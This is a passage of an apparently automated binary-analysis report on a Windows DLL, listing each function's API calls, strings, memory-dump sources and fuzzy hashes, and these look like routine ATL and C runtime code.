_memcmp.LIBVCRUNTIME ref: 6E9DC0DB
_free.LIBCMT ref: 6E9DC14C
_free.LIBCMT ref: 6E9DC165
_free.LIBCMT ref: 6E9DC197
_free.LIBCMT ref: 6E9DC1A0
_free.LIBCMT ref: 6E9DC1AC
GetStartupInfoW.KERNEL32(?), ref: 6E9DC209
GetFileType.KERNEL32(?,6E9DB318,?,00000004), ref: 6E9DC272

Strings

C, xrefs: 6E9DBF99

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
String ID: C
API String ID: 1665419104-1037565863
Opcode ID: 35e9ed82c822b186b2cda01f66b0e9512649cf6fd251a76417150ea6461477d0
Instruction ID: 16d2113a924d4be65c4e4c8a174b58cc1cd1bf51feebd6ccc91d27bbcd443c5e
Opcode Fuzzy Hash: 35e9ed82c822b186b2cda01f66b0e9512649cf6fd251a76417150ea6461477d0
Instruction Fuzzy Hash: 47D19175A01A2A9FDB24DFA8C894B9DB7B8FF49304F108599D949A7354E730EE84CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C34B0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E9FFAA4,?,?), ref: 6E9C34FA
GetClassInfoExW.USER32 ref: 6E9C352D
GetClassInfoExW.USER32 ref: 6E9C3544
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C3553
LoadCursorW.USER32(6E9B0000,00007F00), ref: 6E9C35A7
GetClassInfoExW.USER32 ref: 6E9C35FE
RegisterClassExW.USER32 ref: 6E9C3615
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C36C3

Strings

ATL:%p, xrefs: 6E9C35C8

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: ATL:%p
API String ID: 269841140-4171052921
Opcode ID: fac8e609b0a826edc1caf4eedfbf0751043d6124d76726f670857153b4e178d8
Instruction ID: a073940a545860a6b8e18e2a654649c8392ff54cd25ce5bcfc4a976e70c4d2db
Opcode Fuzzy Hash: fac8e609b0a826edc1caf4eedfbf0751043d6124d76726f670857153b4e178d8
Instruction Fuzzy Hash: 1171C030904B059BDB20DFA9C6446AAB7F8FF99718B14465DE84A97750EB30F984CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6E9B55AE
__Getcvt.LIBCPMT ref: 6E9B55D3

Strings

true, xrefs: 6E9B5669
false, xrefs: 6E9B5630

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: a84448faf572d9be896668696ee6b7956938b3a0c04c79adcaa4e8be6d3e4f32
Instruction ID: c890085b9e473414e2b085667ce142b1df952b106e8cbeec6133e811f97f5c49
Opcode Fuzzy Hash: a84448faf572d9be896668696ee6b7956938b3a0c04c79adcaa4e8be6d3e4f32
Instruction Fuzzy Hash: 7B514131A042458FDB148FA8C8407ABBBFAEF95714F1484AED8455B385CB76E901CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6E9C1148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6E9C1175
MulDiv.KERNEL32(00000008,00000000), ref: 6E9C117E
CreateFontW.GDI32(00000000), ref: 6E9C1187
ReleaseDC.USER32 ref: 6E9C1194
SetTimer.USER32 ref: 6E9C11A9

Part of subcall function 6E9C2460: BeginPaint.USER32(?,?), ref: 6E9C24A3
Part of subcall function 6E9C2460: GetParent.USER32(?), ref: 6E9C24AC
Part of subcall function 6E9C2460: GetClientRect.USER32 ref: 6E9C24C2
Part of subcall function 6E9C2460: CreateCompatibleDC.GDI32(?), ref: 6E9C24C8
Part of subcall function 6E9C2460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E9C24EA
Part of subcall function 6E9C2460: SelectObject.GDI32(00000000,00000000), ref: 6E9C24F6
Part of subcall function 6E9C2460: SelectObject.GDI32(00000000,?), ref: 6E9C2508
Part of subcall function 6E9C2460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E9C2521
Part of subcall function 6E9C2460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E9C252F
Part of subcall function 6E9C2460: SetBkMode.GDI32(?,00000001), ref: 6E9C2538
Part of subcall function 6E9C2460: SetTextColor.GDI32(?,00FFFFFF), ref: 6E9C2544
Part of subcall function 6E9C2460: GetClientRect.USER32 ref: 6E9C2556
Part of subcall function 6E9C2460: ClientToScreen.USER32(?,?), ref: 6E9C2564
Part of subcall function 6E9C2460: ClientToScreen.USER32(?,?), ref: 6E9C2579
Part of subcall function 6E9C2460: ClientToScreen.USER32(?,?), ref: 6E9C259B

DeleteObject.GDI32(?), ref: 6E9C11D0

Strings

Arial, xrefs: 6E9C114E

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 0f815db8008387dbd487df5daaa1a0f832c317d0248c66be8a7936c13667621b
Instruction ID: 3322db368cbdde0e0d2f15005706738aaa3ca7bf495d9ee2f033f2c3da7217fc
Opcode Fuzzy Hash: 0f815db8008387dbd487df5daaa1a0f832c317d0248c66be8a7936c13667621b
Instruction Fuzzy Hash: EC312371200705AFEB60AF69CC45BAA77B8FF56712F004112F205CA2D4C7B5E865CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C87A0, Relevance: 15.2, APIs: 10, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6E9B8D25,6E9B8D27,00000000,00000000,B5334A76,?,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C8814
MultiByteToWideChar.KERNEL32(00000000,00000000,6E9B8D25,?,00000000,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C888F
SysAllocString.OLEAUT32(00000000), ref: 6E9C889A
_com_issue_error.COMSUPP ref: 6E9C88DF
GetLastError.KERNEL32(80070057,B5334A76,?,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C88E4
_com_issue_error.COMSUPP ref: 6E9C88F7
_com_issue_error.COMSUPP ref: 6E9C8901
GetLastError.KERNEL32(8007000E,00000000,?,00000000,?,Function_00019350,6E9FCEB8,000000FE,?,6E9B8D25), ref: 6E9C8917
_com_issue_error.COMSUPP ref: 6E9C892A
_com_issue_error.COMSUPP ref: 6E9C8934

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 44e210379dcf0e85d99c9b956e63ae37b6e10d08ed88c64d5f87c2adeff4d6ad
Instruction ID: c8797cff4f1a99e5b3c3684769dd617f4b6fc2f00339c986432577cc073864a5
Opcode Fuzzy Hash: 44e210379dcf0e85d99c9b956e63ae37b6e10d08ed88c64d5f87c2adeff4d6ad
Instruction Fuzzy Hash: D141E7B1A00305ABDB24AFE4C844BEEBBACFF85B54F104629E519A7640D734F5018FA7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9DA188

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9DA194
_free.LIBCMT ref: 6E9DA19F
_free.LIBCMT ref: 6E9DA1AA
_free.LIBCMT ref: 6E9DA1B5
_free.LIBCMT ref: 6E9DA1C0
_free.LIBCMT ref: 6E9DA1CB
_free.LIBCMT ref: 6E9DA1D6
_free.LIBCMT ref: 6E9DA1E1
_free.LIBCMT ref: 6E9DA1EF

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1567567169814c5e057229a9b52f9fb2605f0be1630a17eeeb2b7d37ce57e67d
Instruction ID: dacce6813a5574f76fb3d9cfabf344dbc321cd5b6baa29ecfdee57616fcb1dc3
Opcode Fuzzy Hash: 1567567169814c5e057229a9b52f9fb2605f0be1630a17eeeb2b7d37ce57e67d
Instruction Fuzzy Hash: 8111F876510918BFCB01EF98C850CED3BA9EF59254B4288A1FA089F220DB75DE54DF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BE310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,B5334A76,?,?,?,6E9E9A60,000000FF), ref: 6E9BE349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6E9BE359
GetModuleHandleW.KERNEL32(Advapi32.dll,B5334A76,?,?,?,6E9E9A60,000000FF), ref: 6E9BE3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6E9BE3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6E9BE418

Strings

RegDeleteKeyTransactedW, xrefs: 6E9BE353
RegDeleteKeyExW, xrefs: 6E9BE3C3
Advapi32.dll, xrefs: 6E9BE344, 6E9BE3B4

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 33803ad6e955409d4c957690106048a42eda19bea810b4ff6da7edbd718711fe
Instruction ID: 6d5f27fa46ea086e5da21b06cd32a1501fe49f499ca41b19771ac327e029c4d6
Opcode Fuzzy Hash: 33803ad6e955409d4c957690106048a42eda19bea810b4ff6da7edbd718711fe
Instruction Fuzzy Hash: 0F31C3B6608709EFDB218F89D800FAABBACEF45721F00416EED2596750D736E451CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B9100, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E9B9149
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6E9B9171
VariantClear.OLEAUT32(?), ref: 6E9B9189

Part of subcall function 6E9B8E70: SysFreeString.OLEAUT32(?), ref: 6E9B8ECE
Part of subcall function 6E9B8E70: SysAllocString.OLEAUT32(?), ref: 6E9B8F39

_com_issue_error.COMSUPP ref: 6E9B91AF

Strings

value, xrefs: 6E9B93D0
counter, xrefs: 6E9B963B, 6E9B9666
page, xrefs: 6E9B99EB, 6E9B9A16
name, xrefs: 6E9B9248

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: 135c4fcf86a14a29c1a1fa6e4fd81809d03ce96df0a3ae1d7474f60e8031d63b
Instruction ID: e99376965afcc122c3393b9c9836bc1092255f0ed829884fcc50d872ec02bb33
Opcode Fuzzy Hash: 135c4fcf86a14a29c1a1fa6e4fd81809d03ce96df0a3ae1d7474f60e8031d63b
Instruction Fuzzy Hash: 8E114C71A1460AABDB20DFA4C908BDEB7BCFF59714F20456AE915A3240E735E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6E9C85E0,6EA00D10,C000008C,?,?,6E9C30BC,?,B5334A76,00000000,00000000,6E9E98D0,000000FF), ref: 6E9C82AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6E9C85E0,6EA00D10,C000008C,?,?,6E9C30BC,?,B5334A76,00000000,00000000), ref: 6E9C82C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6E9C833E

Strings

atlthunk.dll, xrefs: 6E9C82BD
AtlThunk_AllocateData, xrefs: 6E9C82D3
AtlThunk_InitData, xrefs: 6E9C82EA
AtlThunk_DataToCode, xrefs: 6E9C8301
AtlThunk_FreeData, xrefs: 6E9C8318

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 8ef71dbdd1e46dc0a728a620fc9df2e41eb4634e06653c4b815c1e5e4e3ae483
Instruction ID: 0bb3770584f1a4a43107c8a294f74af3ec19ba64f8c6ace7e53a39e83d7e9ebc
Opcode Fuzzy Hash: 8ef71dbdd1e46dc0a728a620fc9df2e41eb4634e06653c4b815c1e5e4e3ae483
Instruction Fuzzy Hash: 3C01C4309056157FDE766ED09C44BC93F596F92A4DF000450FD047A285FB22F9068DB7

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aaf39abc63d98bf7be7a3c8c2fa15d3d6af7a849ba82ec77cafdd46698a0f8d
Instruction ID: 43c4722399307ebebd71d7779fe7f6d53c2fac0e4cd9bc5357f1ea38a884ddde
Opcode Fuzzy Hash: 4aaf39abc63d98bf7be7a3c8c2fa15d3d6af7a849ba82ec77cafdd46698a0f8d
Instruction Fuzzy Hash: B5C1C174A043499FDB028FEAC850BEDBBB8AF5B304F048549D654A7782D734D949CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
_free.LIBCMT ref: 6E9DA2EF
_free.LIBCMT ref: 6E9DA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA330
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
_abort.LIBCMT ref: 6E9DA342

Strings

ios_base::failbit set, xrefs: 6E9DA296

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: c931a47bc80776d1ed716b689a36b9b54ca652a155a7c010c3c2dc76d84fce62
Instruction ID: 8a7b4ab69253bb2aded2dee62ed57f067a58b4a7fea2482c148e9d0ef49aca48
Opcode Fuzzy Hash: c931a47bc80776d1ed716b689a36b9b54ca652a155a7c010c3c2dc76d84fce62
Instruction Fuzzy Hash: D211003164CE3227D6511AF99C54AB9272D9FE3679B248A10FA34911C8FF61C51D8E10

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C83A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E9C8550,00000000), ref: 6E9C83CB
HeapAlloc.KERNEL32(00000000), ref: 6E9C83D2

Part of subcall function 6E9C849D: IsProcessorFeaturePresent.KERNEL32(0000000C,6E9C83B9,00000000,?,6E9C8550,00000000), ref: 6E9C849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6E9C8550,00000000), ref: 6E9C83E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6E9C8409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6E9C841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6E9C8430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E9C8443

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 450a0662f01997cbcfca42c5743bc8a7edc1769922365979fd3d6a20401a35c9
Instruction ID: a9978c3571aa07f9b8b7581486ece538738fc97783c7eb3c26e8782ab55967e2
Opcode Fuzzy Hash: 450a0662f01997cbcfca42c5743bc8a7edc1769922365979fd3d6a20401a35c9
Instruction Fuzzy Hash: 6F119371645F12BBEA312BA58C48F6A366DEF46B56F014824FA05E6244EB20EC014AB3

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C0AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA01478,B5334A76), ref: 6E9C0B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6E9C0BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6E9C0BD5
LoadRegTypeLib.OLEAUT32(6E9F9538,00000000,00000000,?,00000000), ref: 6E9C0BFD
EnterCriticalSection.KERNEL32(6EA01494), ref: 6E9C0DC0
LeaveCriticalSection.KERNEL32(6EA01494), ref: 6E9C0DD6

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: 02ed010dffabb5bdad8aec1b145334d0b374d960946d26fa4c2de41514b14586
Instruction ID: 1b42a15af1bdbeb27d63ff0a1803d25a3233db0feffd834d5edfbd5958637961
Opcode Fuzzy Hash: 02ed010dffabb5bdad8aec1b145334d0b374d960946d26fa4c2de41514b14586
Instruction Fuzzy Hash: 3DB191B4905319EFDB60DBA4C858B99BBB8AF49708F1444D9E809EB340E734EE45CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E49E1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9E4A50
_free.LIBCMT ref: 6E9E4A5E
_free.LIBCMT ref: 6E9E4B8C
_free.LIBCMT ref: 6E9E4B97

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ae21ce480d99d5cdfa1f8e13824fa50e4e5b0f224deef1ec233ec2d16e06b6b0
Instruction ID: 1c2a7368b15780543e0be1db995eecbc32efb3c8f42bf0c76889086f1ac582b5
Opcode Fuzzy Hash: ae21ce480d99d5cdfa1f8e13824fa50e4e5b0f224deef1ec233ec2d16e06b6b0
Instruction Fuzzy Hash: BD61D171904615AFDB11CFE8C841B9EBBF9EF45720F2485AAEA54EB280E770D942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C3DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E9B0000,?,00000104), ref: 6E9C3E7D
GetModuleHandleW.KERNEL32(00000000), ref: 6E9C3EF7

Strings

Module, xrefs: 6E9C3FA2
REGISTRY, xrefs: 6E9C4030
Module_Raw, xrefs: 6E9C3FD3
APPID, xrefs: 6E9C3E3D

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 05467529637e4eff65978d0248b53d3389d8c1044e3ac2bf45571e0263683be2
Instruction ID: d84ccc18de38e94a759bb51ee312778cd52abef407217cfd8710c725a2893b48
Opcode Fuzzy Hash: 05467529637e4eff65978d0248b53d3389d8c1044e3ac2bf45571e0263683be2
Instruction Fuzzy Hash: 6F71C7759002199BDB64EFA4CC54BDA737CAF95714F0005E9D80AAB640DB74DE45CF83

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C03B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E9B0000,?,00000104), ref: 6E9C048D
GetModuleHandleW.KERNEL32(00000000), ref: 6E9C0507

Strings

Module, xrefs: 6E9C05B2
REGISTRY, xrefs: 6E9C063D
Module_Raw, xrefs: 6E9C05DF
APPID, xrefs: 6E9C044D

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 13c240f21eb2e3bd5dac9e287eb0de0ce167b482d6ed777891611313872ddad6
Instruction ID: e967e00ed5154a7572a52ea35ec6f508920e95753040bff0d7e94eac073e94f2
Opcode Fuzzy Hash: 13c240f21eb2e3bd5dac9e287eb0de0ce167b482d6ed777891611313872ddad6
Instruction Fuzzy Hash: 216171759006199BDB64DF90CC50BEE737CAF95B14F4005A9D80AA7680EB74DE84CF93

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E9E024E,?,?,?,?,?), ref: 6E9DFAFE
__fassign.LIBCMT ref: 6E9DFB80
__fassign.LIBCMT ref: 6E9DFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E9DFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6E9E024E), ref: 6E9DFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6E9E024E), ref: 6E9DFC24

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: da3931c13c8f1a53e7bc84441949c5f3cf52ca4bf00105bd5a821ae7ac1b272e
Instruction ID: 19ebbc94c3a721959647d6ad2e1f67967b401c65645cab3c5b59f4f4e42261e3
Opcode Fuzzy Hash: da3931c13c8f1a53e7bc84441949c5f3cf52ca4bf00105bd5a821ae7ac1b272e
Instruction Fuzzy Hash: EE51A170904A599FDB10CFE8C891AEEBBF8EF19304F24851AE955E7250E730EA55CF60

Uniqueness

Uniqueness Score: -1.00%

